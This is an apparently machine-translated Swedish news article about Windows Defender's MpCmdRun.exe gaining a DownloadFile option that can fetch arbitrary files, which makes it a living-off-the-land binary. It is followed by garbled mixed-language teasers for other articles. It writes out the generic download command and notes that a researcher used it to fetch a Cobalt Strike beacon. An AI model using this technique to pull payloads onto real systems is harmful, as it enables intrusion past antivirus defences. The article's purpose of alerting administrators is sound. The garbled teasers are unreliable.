Windows Defender förvandlas till en farlig app för administratörer

  • Windows Försvarare in Windows 10 är ett utmärkt verktyg för att försvara ditt system men en ny uppdatering gjorde det till ett hot.
  • En ny DownloadFile kommandot kan användas för att ladda ner vilken extern fil som helst, inklusive skadlig kod på din dator.
  • Utforska våra Programvaruavsnitt för de bästa artiklarna om de senaste digitala verktygen.
  • Om du är intresserad av de senaste Windows 10-artiklarna, besök vårt omfattande Windows 10 Hub.
Windows Defender förvandlas till en LOLBIN

Windows Defender i Windows 10 är den första försvarslinjen vid skadliga attacker och det gör en ganska bra jobb också.

Men i en av de nya uppdateringarna fick det mäktiga antivirusprogrammet ett nytt DownloadFile-kommando som gör det möjligt för alla att ladda ner alla filer från en URL till en viss sökväg på din dator.

Vi kan kalla detta en exploatering eftersom det också kan användas för att till och med ladda ner skadlig kod, något som upptäcktes av säkerhetsforskaren Mohammad Askar som Postad hans fynd på Twitter.

Hur kan Windows Defender användas för att ladda ner skadlig kod?

Det är väldigt enkelt att använda Microsoft Antimalware Service Command Line Utility (MpCmdRun.exe) för att ladda ner alla filer från en extern källa till din dator.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

I sitt försök, Askar kunde ladda ner Cobalt Strike-fyren, ett välkänt angriparverktyg med den här kommandoraden.

Det nya kommandot ingår i versionen 4.18.2007.8-0 och uppåt vilket ger en ganska bra starttid för angripare.

I grund och botten vänder den här funktionen Windows Defender in i en LOLBIN (lever av linjebinarier), en ofarlig systemfil som kan användas för skadliga ändamål.

Lyckligtvis, efter att du laddat ner den skadliga filen, kommer den att upptäckas av samma Windows Defender eller av en annan antivirusprogram om närvarande.

Från ett pålitligt skyddsprogram förvandlades Windows Defender till ett annat möjligt hot som måste övervakas noga av administratörer och säkerhetsexperter.

Om du har några förslag eller kommentarer, vänligen lämna dem nedan i avsnittet Kommentarer.

Unerwartete Store-Ausnahme i Windows 11 [Bluescreen-Fix]

Unerwartete Store-Ausnahme i Windows 11 [Bluescreen-Fix]Miscellanea

Mehrere Benutzer har meddelandet, att det är i Windows 11 auf den Fehler "unexpected_store_Exception" gestoßen synd, einen BSOD-Fehler, der zum Absturz des Betriebssystems führt. Um das Problem to ...

Läs mer
Melhores navegadores com supporte a Java (e como habilitá-lo)

Melhores navegadores com supporte a Java (e como habilitá-lo)Miscellanea

O Opera One é um ótimo navegador, mas a grande questão é esta: ele suporta Java? Bem, as versões mais recentes do Opera One usam uma versão já incorporada do Java. Para ter certeza de que você con...

Läs mer
Valorant non Funziona i Windows 11: Orsak e kommer Risolvere

Valorant non Funziona i Windows 11: Orsak e kommer RisolvereMiscellanea

Se Valorant non funziona, puoi aggiornare il driver della scheda grafica eller reinstallare il gioco.För detta har Valorant problem på din PC, det är nödvändigt att använda TPM 2.0 och Secure Boot ...

Läs mer